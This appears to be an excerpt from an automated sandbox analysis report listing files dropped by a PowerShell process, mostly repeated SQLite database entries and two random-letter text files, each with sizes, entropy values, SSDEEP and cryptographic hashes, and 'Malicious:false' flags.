            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
            Category:dropped
            Size (bytes):106496
            Entropy (8bit):1.1373607036346451
            Encrypted:false
            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
            MD5:64BCCF32ED2142E76D142DF7AAC75730
            SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
            SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
            SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
            Malicious:false
            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
            Category:dropped
            Size (bytes):106496
            Entropy (8bit):1.1373607036346451
            Encrypted:false
            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
            MD5:64BCCF32ED2142E76D142DF7AAC75730
            SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
            SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
            SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
            Malicious:false
            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
            Category:dropped
            Size (bytes):106496
            Entropy (8bit):1.1373607036346451
            Encrypted:false
            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
            MD5:64BCCF32ED2142E76D142DF7AAC75730
            SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
            SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
            SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
            Malicious:false
            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
            Category:dropped
            Size (bytes):106496
            Entropy (8bit):1.1373607036346451
            Encrypted:false
            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
            MD5:64BCCF32ED2142E76D142DF7AAC75730
            SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
            SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
            SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
            Malicious:false
            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
            Category:dropped
            Size (bytes):51200
            Entropy (8bit):0.8746135976761988
            Encrypted:false
            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
            MD5:9E68EA772705B5EC0C83C2A97BB26324
            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
            Category:dropped
            Size (bytes):51200
            Entropy (8bit):0.8746135976761988
            Encrypted:false
            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
            MD5:9E68EA772705B5EC0C83C2A97BB26324
            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
            Category:dropped
            Size (bytes):51200
            Entropy (8bit):0.8746135976761988
            Encrypted:false
            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
            MD5:9E68EA772705B5EC0C83C2A97BB26324
            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
            Category:dropped
            Size (bytes):51200
            Entropy (8bit):0.8746135976761988
            Encrypted:false
            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
            MD5:9E68EA772705B5EC0C83C2A97BB26324
            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
            Category:dropped
            Size (bytes):51200
            Entropy (8bit):0.8746135976761988
            Encrypted:false
            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
            MD5:9E68EA772705B5EC0C83C2A97BB26324
            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
            Category:dropped
            Size (bytes):51200
            Entropy (8bit):0.8746135976761988
            Encrypted:false
            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
            MD5:9E68EA772705B5EC0C83C2A97BB26324
            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
            Category:dropped
            Size (bytes):196608
            Entropy (8bit):1.1209886597424439
            Encrypted:false
            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
            MD5:EFD26666EAE0E87B32082FF52F9F4C5E
            SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
            SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
            SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
            Malicious:false
            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
            Category:dropped
            Size (bytes):196608
            Entropy (8bit):1.1209886597424439
            Encrypted:false
            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
            MD5:EFD26666EAE0E87B32082FF52F9F4C5E
            SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
            SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
            SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
            Malicious:false
            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
            Category:dropped
            Size (bytes):196608
            Entropy (8bit):1.1209886597424439
            Encrypted:false
            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
            MD5:EFD26666EAE0E87B32082FF52F9F4C5E
            SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
            SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
            SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
            Malicious:false
            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
            Category:dropped
            Size (bytes):196608
            Entropy (8bit):1.1209886597424439
            Encrypted:false
            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
            MD5:EFD26666EAE0E87B32082FF52F9F4C5E
            SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
            SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
            SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
            Malicious:false
            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
            Category:dropped
            Size (bytes):196608
            Entropy (8bit):1.1209886597424439
            Encrypted:false
            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
            MD5:EFD26666EAE0E87B32082FF52F9F4C5E
            SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
            SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
            SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
            Malicious:false
            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
            Category:dropped
            Size (bytes):196608
            Entropy (8bit):1.1209886597424439
            Encrypted:false
            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
            MD5:EFD26666EAE0E87B32082FF52F9F4C5E
            SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
            SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
            SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
            Malicious:false
            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
            Category:dropped
            Size (bytes):196608
            Entropy (8bit):1.1209886597424439
            Encrypted:false
            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
            MD5:EFD26666EAE0E87B32082FF52F9F4C5E
            SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
            SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
            SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
            Malicious:false
            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
            Category:dropped
            Size (bytes):196608
            Entropy (8bit):1.1209886597424439
            Encrypted:false
            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
            MD5:EFD26666EAE0E87B32082FF52F9F4C5E
            SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
            SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
            SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
            Malicious:false
            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
            Category:dropped
            Size (bytes):196608
            Entropy (8bit):1.1209886597424439
            Encrypted:false
            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
            MD5:EFD26666EAE0E87B32082FF52F9F4C5E
            SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
            SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
            SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
            Malicious:false
            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
            Category:dropped
            Size (bytes):196608
            Entropy (8bit):1.1209886597424439
            Encrypted:false
            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
            MD5:EFD26666EAE0E87B32082FF52F9F4C5E
            SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
            SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
            SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
            Malicious:false
            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
            Category:dropped
            Size (bytes):196608
            Entropy (8bit):1.1209886597424439
            Encrypted:false
            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
            MD5:EFD26666EAE0E87B32082FF52F9F4C5E
            SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
            SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
            SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
            Malicious:false
            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
            Category:dropped
            Size (bytes):196608
            Entropy (8bit):1.1209886597424439
            Encrypted:false
            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
            MD5:EFD26666EAE0E87B32082FF52F9F4C5E
            SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
            SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
            SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
            Malicious:false
            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
            Category:dropped
            Size (bytes):98304
            Entropy (8bit):0.08235737944063153
            Encrypted:false
            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
            Category:dropped
            Size (bytes):98304
            Entropy (8bit):0.08235737944063153
            Encrypted:false
            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
            Category:dropped
            Size (bytes):1026
            Entropy (8bit):4.701188456968639
            Encrypted:false
            SSDEEP:24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
            MD5:18A3248DC9C539CCD2C8419D200F1C4D
            SHA1:3B2CEE87F3426C4A08959E9861D274663420215C
            SHA-256:27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
            SHA-512:F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
            Malicious:false
            Preview:GAOBCVIQIJEAUPWDPRZCCBNOLIBVRPPLZPNDXMXWAHTVVUJJRUSFIWRMMSRKOQHCYSYUBMSXZLUDXPNKIPJHNLIKYINEELPXFAGZSNBZUDCHHIXCDHGYSSWPBQTJTTGUSVAKXUCDJBHFKRHEGHIIDQIBNMNBPTCUQXVDKMCQLDDYJEQLPYWFIVRSVCHHZMWWVQSPTEOWKFBQOCSQTIVDEMIEGVVFLVGTQYKHFAQIQIDWGOQCFBYXUBCCAADXTEQWFNWFUUEWWCZWKOPSJAPHFWQQPXLGACJBTIMAPLNZIUQMQYDMTEGLQKPQSZAOUAAZHEFQNKZLRIVEYLQBXOYRAYPVETHTPJWTKBAQMFVCQHILYBXXCIJUSRNECDEBAPQPACKYMONEQAVFVJSLJHMSFLODHAMDEOOQLMHKTRONKXRUSJGZNIPSFDBPUGOOQDGXVUMBHIHMJBJURQUZFOGURXHYACJUXKOHRQKRDYOEUCWNOZMYOMEIECSMGRXADFNSGHNEYHTEUZESWUPBBTWHMAAHATGKEMQJZGUKFHMOPJNWIZHMNPENYBXIYIQQAAAPIDUTGVYULURYREYTCNKILPPERQGQZJOXIUVLLDJBKFXUJTGVBMXJXFCOCDEASKYTKWQYKXJPQPYIMVFTRDRIZGWDHSNPUPGXIZLQHXDLMDNRJWXSZBGUTMSTDCUAYDTGXGFEGTPPNOUDQYIUIRVWYSBPWRTNAHWZOJNZBMFUMOBETTVAJIKGCUOZZNFQXGHJMEETOIEJZISKBKYAFTPYJUBCNCNXVOJQLDZBVOEERMNSHPDRPHBKXUPBSMXTNRSKCXXOGLQOGPAAXIHATAVXMPGBBSIKATHNAZZHCOKHGTBSCMZLDTZSIPNGBQAQVBLOEZNNOCGBGKUDVAVPXMJZWAFTYFQUZALBMQWWTFBKYRIAXMCLPBVGGEVXGVKQOKGLWBYOFWLKNSBXJMTWCKOJNEQGGGMZAEJRHKRITMKM
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
            Category:dropped
            Size (bytes):1026
            Entropy (8bit):4.692704155467908
            Encrypted:false
            SSDEEP:24:zrCxfe2LWgi+vQ2TVmOkCRMqftTB+IkHJMBxmT+gmPrwxYu:zSLpN5mOhMq1NUHCLm0Mx/
            MD5:D0B81B6D51E4EDDB3769BCE2A5F1538F
            SHA1:08D04E7E91BD584CC92DB2586E3752A6E50FF2A7
            SHA-256:18CE24DD08DD5F5AC0F5CECA3D6551DFDBBD4893A4A9A9A9331E8ADB67061A33
            SHA-512:CB9E881EE3E57B79597C4AD35D24CBF490882CAB222FD687E52B01798E643876D97A51BE67CBB9AC8CD21EAEC8383FF822569E8E523B165607D328FC53E97B80
            Malicious:false
